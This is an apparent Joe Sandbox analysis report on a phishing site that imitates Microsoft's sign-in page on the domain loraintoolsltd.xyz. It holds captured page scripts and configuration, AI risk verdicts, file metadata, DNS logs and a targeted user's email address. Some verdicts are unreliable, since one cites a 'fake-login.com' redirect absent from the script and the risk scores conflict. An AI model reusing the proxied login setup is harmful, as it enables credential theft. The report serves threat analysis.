i(e){r(e,a,s)\|\|o.q.push({"id":e,"c":a,"a":s})}var a=0,s=[],u=1;"function"==typeof n\|\|(a=n, u=2);for(var c=u;c<arguments.length;c++){s.push(arguments[c])}t instanceof Array?e(t,i):i(t)},o.register=fun
URL: https://login.loraintoolsltd.xyz/common/oauth2/v2.... Model: Joe Sandbox AI	{ "risk_score": 6, "reasoning": "The provided JavaScript snippet contains several behaviors that raise moderate security concerns. It includes external data transmission to potentially untrusted domains, the use of fallback domains, and aggressive DOM manipulation. While the script appears to have a legitimate purpose related to authentication and authorization, the lack of transparency and the use of obfuscated URLs warrant further review to ensure the script's integrity and the protection of user data." }
//<![CDATA[ $Config={"fShowPersistentCookiesWarning":false,"urlMsaSignUp":"https://live.loraintoolsltd.xyz/oauth20_authorize.srf?client_id=4765445b-32c6-49b0-83e6-1d93765276ca\u0026scope=openid+profile+https%3a%2f%2fwww.office.com%2fv2%2fOfficeHome.All\u0026redirect_uri=https%3a%2f%2fwww.office.com%2flandingv2\u0026response_type=code+id_token\u0026state=kniLQk2xa-DHvggiqLVufaTxHzCt68_MOtTY5fKlih45LJaEtQHGehVSVLqXYtSTLKl7iyajJ6lyQqo6GEN-Tk6jQnZKaGbT8bxQSdCJFv2jObO6HnLeK6DCIfhusbndleU5Y_7N4PjytOVZsv_-21jQic58sZlY45vQ7g57a5pqqB69FWA5-SslViaTZOPSwLq5VGXj1t9I08JzKeIVwUxzQzoNLRT_ck8yy8kZR9yzZNTR3jZl5f2iydPalDw4u9-YUJkovZMAqJfRkUNRUA\u0026response_mode=form_post\u0026nonce=638732702233892554.YjNkN2RhY2UtZTllZC00NTdiLWFjZWUtZDBmNWZjMmVhMjgxZTdkYzY4NWQtNzFjMS00Y2RmLWE0ZDktODc3NGIyMjQwN2Yx\u0026x-client-SKU=ID_NET8_0\u0026x-client-Ver=7.5.1.0\u0026uaid=afbe7e5db8174cfb925afa049f49afdb\u0026msproxy=1\u0026issuer=mso\u0026tenant=common\u0026ui_locales=en-US\u0026signup=1\u0026lw=1\u0026fl=easi2\u0026epct=PAQABDgEAAABVrSpeuWamRam2jAF1XRQE9KOs6QEy91LK7V09jZwnwKx_O8qFhGIsFLkas20QaP8Pi16OjRtb1ZEK56TW6UTMlZmZ8FTASk_0ZLCQqNSQMH_m4SUbvDhPpiYcW4IES3MQhyRPCGyK622uDgweaGAFwmxs1MCfnd1_rXiSa3wrhb7o8zL0yVyzVOVZVdI1i7t9Cx1LC0hLNTjHOJBlABW-BPsS3dRA3KFMMGsrcQC9TSAA\u0026jshs=0","urlMsaLogout":"https://live.loraintoolsltd.xyz/logout.srf?iframed_by=https%3a%2f%2flogin.loraintoolsltd.xyz","urlOtherIdpForget":"https://live.loraintoolsltd.xyz/forgetme.srf?iframed_by=https%3a%2f%2flogin.loraintoolsltd.xyz","showCantAccessAccountLink":true,"urlGitHubFed":"https://live.loraintoolsltd.xyz/oauth20_authorize.srf?client_id=4765445b-32c6-49b0-83e6-1d93765276ca\u0026scope=openid+profile+https%3a%2f%2fwww.office.com%2fv2%2fOfficeHome.All\u0026redirect_uri=https%3a%2f%2fwww.office.com%2flandingv2\u0026response_type=code+id_token\u0026state=kniLQk2xa-DHvggiqLVufaTxHzCt68_MOtTY5fKlih45LJaEtQHGehVSVLqXYtSTLKl7iyajJ6lyQqo6GEN-Tk6jQnZKaGbT8bxQSdCJFv2jObO6HnLeK6DCIfhusbndleU5Y_7N4PjytOVZsv_-21jQic58sZlY45vQ7g57a5pqqB69FWA5-SslViaTZOPSwLq5VGXj1t9I08JzKeIVwUxzQzoNLRT_ck8yy8kZR9yzZNTR3jZl5f2iydPalDw4u9-YUJkovZMAqJfRkUNRUA\u0026response_mode=form_post\u0026nonce=638732702233892554.YjNkN2RhY2UtZTllZC00NTdiLWFjZWUtZDBmNWZjMmVhMjgxZTdkYzY4NWQtNzFjMS00Y2RmLWE0ZDktODc3NGIyMjQwN2Yx\u0026x-client-SKU=ID_NET8_0\u0026x-client-Ver=7.5.1.0\u0026uaid=afbe7e5db8174cfb925afa049f49afdb\u0026msproxy=1\u0026issuer=mso\u0026tenant=common\u0026ui_locales=en-US\u0026epct=PAQABDgEAAABVrSpeuWamRam2jAF1XRQECHp9KQNZbz1xVdqY8NtdPM8F8b94ZY5BkHJ70HCF_vVkfE-Rb_CtYV9e_iu9sobPuokre8vlM7u-vq-_SJtItM4Y4GthxPXSR6nlXmfTOHER8a1mEqVzJiKlI3X7lTpuuMPeW6v0W1mOBY8sJ9rBas5eoag-6tOQYfGc0SaNl4VVqQfklyuJY6uhmHEMOKrhRKaWzTXhR8mD8-DEkdxKIyAA\u0026jshs=0\u0026idp_hint=github.com","arrExternalTrustedRealmFederatedIdps":[],"fShowSignInWithGitHubOnlyOnCredPicker":true,"fEnableShowResendCode":true,"iShowResendCodeDelay":90000,"sSMSCtryPhoneData":"AF~Afghanistan~93!!!AX~land Islands~358!!!AL~Albania~355!!!DZ~Algeria~213!!!AS~American Samoa~1!!!AD~Andorra~376!!!AO~Angola~244!!!AI~Anguilla~1!!!AG~Antigua and Barbuda~1!!!AR~Argentina~54!!!AM~Armenia~374!!!AW~Aruba~297!!!AC~Ascension Island~247!!!AU~Australia~61!!!AT~Austria~43!!!AZ~Azerbaijan~994!!!BS~Bahamas~1!!!BH~Bahrain~973!!!BD~Bangladesh~880!!!BB~Barbados~1!!!BY~Belarus~375!!!BE~Belgium~32!!!BZ~Belize~501!!!BJ~Benin~229!!!BM~Bermuda~1!!!BT~Bhutan~975!!!BO~Bolivia~591!!!BQ~Bonaire~599!!!BA~Bosnia and Herzegovina~387!!!BW~Botswana~267!!!BR~Brazil~55!!!IO~British Indian Ocean Territory~246!!!VG~British Virgin Islands~1!!!BN~Brunei~673!!!BG~Bulgaria~359!!!BF~Burkina Faso~226!!!BI~Burundi~257!!!CV~Cabo Verde~238!!!KH~Cambodia~855!!!CM~Cameroon~237!!!CA~Canada~1!!!KY~Cayman Islands~1!!!CF~Central African Republic~236!!!TD~Chad~235!!!CL~Chile~56!!!CN~China~86!!!CX~Christmas Island~61!!!CC~Cocos (Keeling) Islands~61!!!CO~Colombia~57!!!KM~Comoros~269!!!CG~Congo~242!!!CD~Congo (DRC)~243!!!CK~Cook Islands~682!!!CR~Costa Rica~506!!!CI~Cte d\u0027Ivoire~225!!!HR~Croatia~385!!!CU~Cuba~53!!!CW~
URL: https://login.loraintoolsltd.xyz/common/oauth2/v2.... Model: Joe Sandbox AI	{ "risk_score": 6, "reasoning": "The provided JavaScript snippet contains several behaviors that raise moderate security concerns. It includes external data transmission to third-party domains, the use of fallback domains, and aggressive DOM manipulation. While the script appears to have a legitimate purpose, such as analytics or telemetry, the lack of transparency and the use of some outdated practices warrant further review. The overall risk score is in the medium range, indicating the need for closer inspection to ensure the script's security and alignment with best practices." }
//<![CDATA[ $Config={"iMaxStackForKnockoutAsyncComponents":10000,"fShowButtons":true,"urlCdn":"https://aadcdn.msauth.net/shared/1.0/","urlDefaultFavicon":"https://aadcdn.msauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico","urlPost":"/common/oauth2/v2.0/authorize?client-request-id=afbe7e5d-b817-4cfb-925a-fa049f49afdb\u0026client_id=4765445b-32c6-49b0-83e6-1d93765276ca\u0026mkt=en-US\u0026nonce=638732702233892554.YjNkN2RhY2UtZTllZC00NTdiLWFjZWUtZDBmNWZjMmVhMjgxZTdkYzY4NWQtNzFjMS00Y2RmLWE0ZDktODc3NGIyMjQwN2Yx\u0026redirect_uri=https%3a%2f%2fwww.office.com%2flandingv2\u0026response_mode=form_post\u0026response_type=code+id_token\u0026scope=openid+profile+https%3a%2f%2fwww.office.com%2fv2%2fOfficeHome.All\u0026state=kniLQk2xa-DHvggiqLVufaTxHzCt68_MOtTY5fKlih45LJaEtQHGehVSVLqXYtSTLKl7iyajJ6lyQqo6GEN-Tk6jQnZKaGbT8bxQSdCJFv2jObO6HnLeK6DCIfhusbndleU5Y_7N4PjytOVZsv_-21jQic58sZlY45vQ7g57a5pqqB69FWA5-SslViaTZOPSwLq5VGXj1t9I08JzKeIVwUxzQzoNLRT_ck8yy8kZR9yzZNTR3jZl5f2iydPalDw4u9-YUJkovZMAqJfRkUNRUA\u0026ui_locales=en-US\u0026x-client-SKU=ID_NET8_0\u0026x-client-ver=7.5.1.0\u0026sso_reload=True","iPawnIcon":0,"sPOST_Username":"","sFTName":"flowToken","fEnableOneDSClientTelemetry":true,"urlReportPageLoad":"https://login.loraintoolsltd.xyz/common/instrumentation/reportpageload?mkt=en-US","dynamicTenantBranding":null,"staticTenantBranding":null,"oAppCobranding":{},"iBackgroundImage":2,"fApplicationInsightsEnabled":false,"iApplicationInsightsEnabledPercentage":0,"urlSetDebugMode":"https://login.loraintoolsltd.xyz/common/debugmode","fEnableCssAnimation":true,"fAllowGrayOutLightBox":true,"fUseMsaSessionState":true,"fIsRemoteNGCSupported":true,"desktopSsoConfig":{"isEdgeAnaheimAllowed":true,"iwaEndpointUrlFormat":"https://autologon.microsoftazuread-sso.com/{0}/winauth/sso?client-request-id=afbe7e5d-b817-4cfb-925a-fa049f49afdb","iwaSsoProbeUrlFormat":"https://autologon.microsoftazuread-sso.com/{0}/winauth/ssoprobe?client-request-id=afbe7e5d-b817-4cfb-925a-fa049f49afdb","iwaIFrameUrlFormat":"https://autologon.microsoftazuread-sso.com/{0}/winauth/iframe?client-request-id=afbe7e5d-b817-4cfb-925a-fa049f49afdb\u0026isAdalRequest=False","iwaRequestTimeoutInMs":10000,"startDesktopSsoOnPageLoad":false,"progressAnimationTimeout":10000,"isEdgeAllowed":false,"minDssoEdgeVersion":"17","isSafariAllowed":true,"redirectUri":"","isIEAllowedForSsoProbe":true,"edgeRedirectUri":"https://autologon.microsoftazuread-sso.com/common/winauth/sso/edgeredirect?client-request-id=afbe7e5d-b817-4cfb-925a-fa049f49afdb\u0026origin=login.loraintoolsltd.xyz\u0026is_redirected=1","isFlowTokenPassedInEdge":true},"iSessionPullType":2,"fUseSameSite":true,"isGlobalTenant":true,"uiflavor":1001,"fOfflineAccountVisible":false,"fEnableUserStateFix":true,"fShowAccessPassPeek":true,"fUpdateSessionPollingLogic":true,"fEnableShowPickerCredObservable":true,"fFetchSessionsSkipDsso":true,"fIsCiamUserFlowUxNewLogicEnabled":true,"fUseNonMicrosoftDefaultBrandingForCiam":true,"fRemoveCustomCss":true,"fFixUICrashForApiRequestHandler":true,"fShowUpdatedKoreanPrivacyFooter":true,"fUsePostCssHotfix":true,"fUseHighContrastDetectionMode":true,"fFixUserFlowBranding":true,"fEnablePasskeyNullFix":true,"fEnableRefreshCookiesFix":true,"urlAcmaServerPath":"https://login.loraintoolsltd.xyz","sTenantId":"00000000-0000-0000-0000-000000000000","scid":1013,"hpgact":1800,"hpgid":6,"apiCanary":"PAQABDgEAAABVrSpeuWamRam2jAF1XRQEzl0rfRKhVKMOUYxCVcLDi7CWX0t1RojeDV4f8mOqPDJvg7EivtjIqKir39clg770XWI-j0yBMjA66PXUfjCC5KxEHr6x_cwKXxtWwsAjiME4eyY4KuE5j6lkzqU_pwBv7gbUWWkm0KeLeQhM2Dn2InC2BpI1AY18EvlI_ZpItie08tiZSnIPpdpQMMY93agWWwH8HNcvCOR8bJUuQ8cyrSAA","canary":"COyb0ZF93ZME/XJEK62xdUOp+coE3dqmhSflswQa6Is=8:1:CANARY:/qqRBCl1bti9jtr/cHyDD8gIWFvSjcUXyymaY/g1SxY=","sCanaryTokenName":"canary","fSkipRenderingNewCanaryToken":false,"fEnableNewCsrfProtection":true,"correlationId":"afbe7e5d-b817-4cfb-925a-fa049f49afdb","sessionId":"1b5367d7-b661-495c-8fc6-f16bdaaa1b00","locale":{"mkt":"en-US","lcid":1033},"slMaxRetry":2,"
URL: https://live.loraintoolsltd.xyz/Me.htm?v=3... Model: Joe Sandbox AI	{ "risk_score": 6, "reasoning": "The script demonstrates moderate-risk behaviors, including external data transmission and the use of fallback domains. While it appears to have an analytics or telemetry purpose, the script also exhibits some obfuscation and aggressive DOM manipulation, which raises concerns. Further review is recommended to ensure the script's legitimacy and the appropriate handling of user data." }
!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return e.m=t,e.c=s,e.p="",e(0)}([function(t,e){function s(t){for(var e=f[S],s=0,n=e.length;s<n;++s)if(e[s]===t)return!0;return!1}function n(t){if(!t)return null;for(var e=t+"=",s=document.cookie.split(";"),n=0,i=s.length;n<i;n++){var a=s[n].replace(/^\s(\w+)\s=\s*/,"$1=").replace(/(\s+$)/,"");if(0===a.indexOf(e))return a.substring(e.length)}return null}function i(t,e,s){if(t)for(var n=t.split(":"),i=null,a=0,r=n.length;a<r;++a){var c=null,S=n[a].split("$");if(0===a&&(i=parseInt(S.shift()),!i))return;var l=S.length;if(l>=1){var p=o(i,S[0]);if(!p\|\|s[p])continue;c={signInName:p,idp:"msa",isSignedIn:!0}}if(l>=3&&(c.firstName=o(i,S[1]),c.lastName=o(i,S[2])),l>=4){var f=S[3],d=f.split("\|");c.otherHashedAliases=d}if(l>=5){var h=parseInt(S[4],16);h&&(c.isSignedIn=h===g.SignedInToRP\|\|h===g.SignedInToIDP)}if(l>=6){var m=parseInt(S[5],16);m&&(c.isWindowsSso=0!==(m&u.IsWindowsSso))}if(l>=7){var v=parseInt(S[6],16);v&&(c.remoteIdpFlags=v)}l>=8&&(c.sessionId=S[7]),c&&(e.push(c),s[c.signInName]=!0)}}function a(t){if(t&&s(t.origin)&&t.data)try{var e=JSON.parse(t.data);if("startStaticMe"!==e.messageType)return;r(t.origin,e)}catch(n){return}}function o(t,e){return 1===t?e:t>=2?decodeURIComponent(e):null}function r(t,e){var s=n("JSH"),a=n("JSHP"),o=!0,r={transientState:"",persistentState:"",hasStorageAccess:0},S={messageType:"msaMeCached",version:2,userList:[],tilesState:r};try{var l={};i(s,S.userList,l),i(a,S.userList,l),console.log(e.useMsaSessionState),e.useMsaSessionState===!0&&(0!=S.userList.length?(S.tilesState.hasStorageAccess=2,S.tilesState.transientState=s,S.tilesState.persistentState=a):"function"==typeof document.hasStorageAccess?(o=!1,document.hasStorageAccess().then(function(n){console.log("Storage access:",n),n?(S.tilesState.hasStorageAccess=2,S.tilesState.transientState=s,S.tilesState.persistentState=a):e.sessionState&&(S.tilesState.hasStorageAccess=1,e.sessionState.transientState&&(S.tilesState.transientState=e.sessionState.transientState,i(e.sessionState.transientState,S.userList,l)),e.sessionState.persistentState&&(S.tilesState.persistentState=e.sessionState.persistentState,i(e.sessionState.persistentState,S.userList,l))),t&&c.parent.postMessage(JSON.stringify(S),t)})["catch"](function(e){console.error("Error checking storage access:",e),S.error=e.message,t&&c.parent.postMessage(JSON.stringify(S),t)})):(S.tilesState.hasStorageAccess=2,S.tilesState.transientState=s,S.tilesState.persistentState=a))}catch(p){S.error=p.message}t&&o&&c.parent.postMessage(JSON.stringify(S),t)}var c=window,S="prod",l="",p="",g={None:0,SignedInToRP:1,SignedInToIDP:2,Remembered:3},u={None:0,IsWindowsSso:1},f={dev:[l,p],"int":["https://login.windows-ppe.net"],prod:["https://login.loraintoolsltd.xyz","https://login.microsoft.com","https://device.login.loraintoolsltd.xyz","https://login.windows-ppe.net","https://login.windows.net","https://login.microsoftonline.de","https://login.partner.microsoftonline.cn","https://login.chinacloudapi.cn","https://login.microsoftonline.us","https://login-us.microsoftonline.com","https://logincert.microsoftonline.com"]};!function(){c.postMessage&&(c.addEventListener?c.addEventListener("message",a):c.attachEvent("message",a))}()}]));
URL: https://login.loraintoolsltd.xyz/common/oauth2/v2.... Model: Joe Sandbox AI	{ "risk_score": 7, "reasoning": "This script demonstrates several high-risk behaviors, including redirecting the user to an unknown domain ('fake-login.com') and collecting user credentials via XHR. The script also attempts to detect if it is running in an iframe and, if so, redirects the top-level window to the current URL with an additional query parameter. This behavior is highly suspicious and indicates potential phishing or credential theft activity." }
//<![CDATA[ !function(){var e=window,s=e.document,i=e.$Config\|\|{};if(e.self===e.top){s&&s.body&&(s.body.style.display="block")}else if(!i.allowFrame){var o,t,r,f,n,d;if(i.fAddTryCatchForIFrameRedirects){try{o=e.self.location.href,t=o.indexOf("#"),r=-1!==t,f=o.indexOf("?"),n=r?t:o.length,d=-1===f\|\|r&&f>t?"?":"&",o=o.substr(0,n)+d+"iframe-request-id="+i.sessionId+o.substr(n),e.top.location=o}catch(e){}}else{o=e.self.location.href,t=o.indexOf("#"),r=-1!==t,f=o.indexOf("?"),n=r?t:o.length,d=-1===f\|\|r&&f>t?"?":"&", o=o.substr(0,n)+d+"iframe-request-id="+i.sessionId+o.substr(n),e.top.location=o}}}(); //
URL: https://login.loraintoolsltd.xyz/FgJIoRDm#susan.kalcroft@state.ne.gov Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Please confirm you are not a bot by clicking the button above.", "prominent_button_name": "I am not a bot", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": true, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false, "page_classification": "unknown" }

URL: https://login.loraintoolsltd.xyz/common/oauth2/v2.... Model: Joe Sandbox AI	```json { "risk_score": 3, "reasoning": "The script primarily involves DOM manipulation and event handling, with no high-risk indicators like dynamic code execution or data exfiltration. It uses legacy practices and tracking behavior, but these are not inherently malicious. The script appears to be a debugging or logging utility, which aligns with typical analytics or telemetry functionality." }
//<![CDATA[ !function(){var e=window,r=e.$Debug=e.$Debug\|\|{},t=e.$Config\|\|{};if(!r.appendLog){var n=[],o=0;r.appendLog=function(e){var r=t.maxDebugLog\|\|25,i=(new Date).toUTCString()+":"+e;n.push(o+":"+i),n.length>r&&n.shift(),o++},r.getLogs=function(){return n}}}(),function(){function e(e,r){function t(i){var a=e[i];if(i<n-1){return void(o.r[a]?t(i+1):o.when(a,function(){t(i+1)}))}r(a)}var n=e.length;t(0)}function r(e,r,i){function a(){var e=!!s.method,o=e?s.method:i[0],a=s.extraArgs\|\|[],u=n.$WebWatson;try{ var c=t(i,!e);if(a&&a.length>0){for(var d=a.length,l=0;l<d;l++){c.push(a[l])}}o.apply(r,c)}catch(e){return void(u&&u.submitFromException&&u.submitFromException(e))}}var s=o.r&&o.r[e];return r=r\|\|this,s&&(s.skipTimeout?a():n.setTimeout(a,0)),s}function t(e,r){return Array.prototype.slice.call(e,r?1:0)}var n=window;n.$Do\|\|(n.$Do={"q":[],"r":[],"removeItems":[],"lock":0,"o":[]});var o=n.$Do;o.when=function(t,n){function i(e){r(e,a,s)\|\|o.q.push({"id":e,"c":a,"a":s})}var a=0,s=[],u=1;"function"==typeof n\|\|(a=n, u=2);for(var c=u;c<arguments.length;c++){s.push(arguments[c])}t instanceof Array?e(t,i):i(t)},o.register=function(e,t,n){if(!o.r[e]){o.o.push(e);var i={};if(t&&(i.method=t),n&&(i.skipTimeout=n),arguments&&arguments.length>3){i.extraArgs=[];for(var a=3;a<arguments.length;a++){i.extraArgs.push(arguments[a])}}o.r[e]=i,o.lock++;try{for(var s=0;s<o.q.length;s++){var u=o.q[s];u.id==e&&r(e,u.c,u.a)&&o.removeItems.push(u)}}catch(e){throw e}finally{if(0===--o.lock){for(var c=0;c<o.removeItems.length;c++){ for(var d=o.removeItems[c],l=0;l<o.q.length;l++){if(o.q[l]===d){o.q.splice(l,1);break}}}o.removeItems=[]}}}},o.unregister=function(e){o.r[e]&&delete o.r[e]}}(),function(e,r){function t(){if(!a){if(!r.body){return void setTimeout(t)}a=!0,e.$Do.register("doc.ready",0,!0)}}function n(){if(!s){if(!r.body){return void setTimeout(n)}t(),s=!0,e.$Do.register("doc.load",0,!0),i()}}function o(e){(r.addEventListener\|\|"load"===e.type\|\|"complete"===r.readyState)&&t()}function i(){ r.addEventListener?(r.removeEventListener("DOMContentLoaded",o,!1),e.removeEventListener("load",n,!1)):r.attachEvent&&(r.detachEvent("onreadystatechange",o),e.detachEvent("onload",n))}var a=!1,s=!1;if("complete"===r.readyState){return void setTimeout(n)}!function(){r.addEventListener?(r.addEventListener("DOMContentLoaded",o,!1),e.addEventListener("load",n,!1)):r.attachEvent&&(r.attachEvent("onreadystatechange",o),e.attachEvent("onload",n))}()}(window,document),function(){function e(){ return f.$Config\|\|f.ServerData\|\|{}}function r(e,r){var t=f.$Debug;t&&t.appendLog&&(r&&(e+=" '"+(r.src\|\|r.href\|\|"")+"'",e+=", id:"+(r.id\|\|""),e+=", async:"+(r.async\|\|""),e+=", defer:"+(r.defer\|\|"")),t.appendLog(e))}function t(){var e=f.$B;if(void 0===d){if(e){d=e.IE}else{var r=f.navigator.userAgent;d=-1!==r.indexOf("MSIE ")\|\|-1!==r.indexOf("Trident/")}}return d}function n(){var e=f.$B;if(void 0===l){if(e){l=e.RE_Edge}else{var r=f.navigator.userAgent;l=-1!==r.indexOf("Edge")}}return l}function o(e){ var r=e.indexOf("?"),t=r>-1?r:e.length,n=e.lastIndexOf(".",t);return e.substring(n,n+v.length).toLowerCase()===v}function i(){var r=e();return(r.loader\|\|{}).slReportFailure\|\|r.slReportFailure\|\|!1}function a(){return(e().loader\|\|{}).redirectToErrorPageOnLoadFailure\|\|!1}function s(){return(e().loader\|\|{}).logByThrowing\|\|!1}function u(e){if(!t()&&!n()){return!1}var r=e.src\|\|e.href\|\|"";if(!r){return!0}if(o(r)){var i,a,s;try{i=e.sheet,a=i&&i.cssRules,s=!1}catch(e){s=!0}if(i&&!a&&s){return!0} if(i&&a&&0===a.length){return!0}}return!1}function c(){function t(e){g.getElementsByTagName("head")[0].appendChild(e)}function n(e,r,t,n){var u=null;return u=o(e)?i(e):"script"===n.toLowerCase()?a(e):s(e,n),r&&(u.id=r),"function"==typeof u.setAttribute&&(u.setAttribute("crossorigin","anonymous"),t&&"string"==typeof t&&u.setAttribute("integrity",t)),u}function i(e){var r=g.createElement("link");return r.rel="stylesheet",r.type="text/css",r.href=e,r}function a(e){ var r=g.createElement("script"),t=g.querySelector("s
URL: https://login.loraintoolsltd.xyz/FgJIoRDm#susan.kalcroft@state.ne.gov Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: https://login.loraintoolsltd.xyz Model: Joe Sandbox AI	```json{ "brand": "unknown", "brand_classification": "unknown", "legit_url": "unknown", "similarity": 2, "spoofed": 1, "reasoning": "The URL 'https://login.loraintoolsltd.xyz' does not closely resemble any well-known brand or legitimate URL. The domain 'loraintoolsltd.xyz' does not appear to be a common misspelling or visual mimicry of a known brand. The use of 'login' as a subdomain is generic and does not inherently suggest typosquatting. The domain extension '.xyz' is a generic top-level domain and does not imply any specific brand association. Overall, there is no strong evidence of typosquatting, and the URL could be for a legitimate, unrelated business or service."}
URL: https://login.loraintoolsltd.xyz
URL: https://login.loraintoolsltd.xyz/FgJIoRDm#susan.kalcroft@state.ne.gov Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Please confirm you are not a bot by clicking the button above.", "prominent_button_name": "I am not a bot", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": true, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false, "page_classification": "unknown" }

URL: https://login.loraintoolsltd.xyz/FgJIoRDm#susan.kalcroft@state.ne.gov Model: Joe Sandbox AI	{ "brands": [ "Cloudflare" ] }
	{ "brands": [ "Cloudflare" ] }
URL: https://login.loraintoolsltd.xyz/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FO Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "This username may be incorrect. Make sure you typed it correctly. Otherwise, contact your admin.", "prominent_button_name": "Next", "text_input_field_labels": [ "susan.kalcroft@state.ne.gov" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false, "page_classification": "unknown" } Google indexed: False

URL: https://login.loraintoolsltd.xyz/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FO Model: Joe Sandbox AI	{ "brands": [ "Microsoft" ] } Google indexed: False
	{ "brands": [ "Microsoft" ] } Google indexed: False
URL: https://login.loraintoolsltd.xyz/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FO Model: Joe Sandbox AI	```json{ "legit_domain": "microsoft.com", "classification": "wellknown", "reasons": [ "The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'.", "The URL 'login.loraintoolsltd.xyz' does not match the legitimate domain for Microsoft.", "The domain 'loraintoolsltd.xyz' does not have any known association with Microsoft.", "The use of a generic domain name with no clear connection to Microsoft is suspicious.", "The presence of a login page on an unrelated domain is a common phishing tactic." ], "riskscore": 9} Google indexed: False
URL: login.loraintoolsltd.xyz Brands: Microsoft Input Fields: susan.kalcroft@state.ne.gov

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Jan 23 22:03:12 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.975590442965928
Encrypted:	false
SSDEEP:	48:8LbdvTHT/HaidAKZdA19ehwiZUklqehty+3:8L1P4uy
MD5:	4ED10639AACA2D056D2E135613A7E15E
SHA1:	34C8255F1A5C9F07C1678E1DAD767B7916B80BC4
SHA-256:	268488C0756C2B5F342E70BF8BF153EDFC373C1F327F7595A9A04F9B31A3C7E8
SHA-512:	18B6070B74893C549F98676A707682B1E53C8DADA30A2DDE146B470E6675DBAB377A8ACED3B1E5E1E1DB36F0EB6E40A7A221D5C9535CE26D59AFC0351B005A13
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,....e.'..m..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I7Ze.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V7Ze.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V7Ze.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V7Ze............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V7Zg............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............<.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 24, 2025 00:03:11.174280882 CET	53	63445	1.1.1.1	192.168.2.5
Jan 24, 2025 00:03:11.272146940 CET	53	55226	1.1.1.1	192.168.2.5
Jan 24, 2025 00:03:12.279153109 CET	53	63873	1.1.1.1	192.168.2.5
Jan 24, 2025 00:03:15.461275101 CET	59613	53	192.168.2.5	1.1.1.1
Jan 24, 2025 00:03:15.461275101 CET	49202	53	192.168.2.5	1.1.1.1
Jan 24, 2025 00:03:15.468580008 CET	53	49202	1.1.1.1	192.168.2.5
Jan 24, 2025 00:03:15.468619108 CET	53	59613	1.1.1.1	192.168.2.5
Jan 24, 2025 00:03:16.752011061 CET	56866	53	192.168.2.5	1.1.1.1
Jan 24, 2025 00:03:16.752146006 CET	49251	53	192.168.2.5	1.1.1.1
Jan 24, 2025 00:03:17.240755081 CET	53	56866	1.1.1.1	192.168.2.5
Jan 24, 2025 00:03:17.247849941 CET	53	49251	1.1.1.1	192.168.2.5
Jan 24, 2025 00:03:18.007524967 CET	58413	53	192.168.2.5	1.1.1.1
Jan 24, 2025 00:03:18.008064032 CET	63088	53	192.168.2.5	1.1.1.1
Jan 24, 2025 00:03:18.022339106 CET	53	63088	1.1.1.1	192.168.2.5
Jan 24, 2025 00:03:18.028714895 CET	53	58413	1.1.1.1	192.168.2.5
Jan 24, 2025 00:03:18.245863914 CET	57272	53	192.168.2.5	1.1.1.1
Jan 24, 2025 00:03:18.246057034 CET	49181	53	192.168.2.5	1.1.1.1
Jan 24, 2025 00:03:18.740792036 CET	53	49181	1.1.1.1	192.168.2.5
Jan 24, 2025 00:03:18.890507936 CET	53	57272	1.1.1.1	192.168.2.5
Jan 24, 2025 00:03:19.039248943 CET	54422	53	192.168.2.5	1.1.1.1
Jan 24, 2025 00:03:19.039411068 CET	53207	53	192.168.2.5	1.1.1.1
Jan 24, 2025 00:03:19.039653063 CET	58700	53	192.168.2.5	1.1.1.1
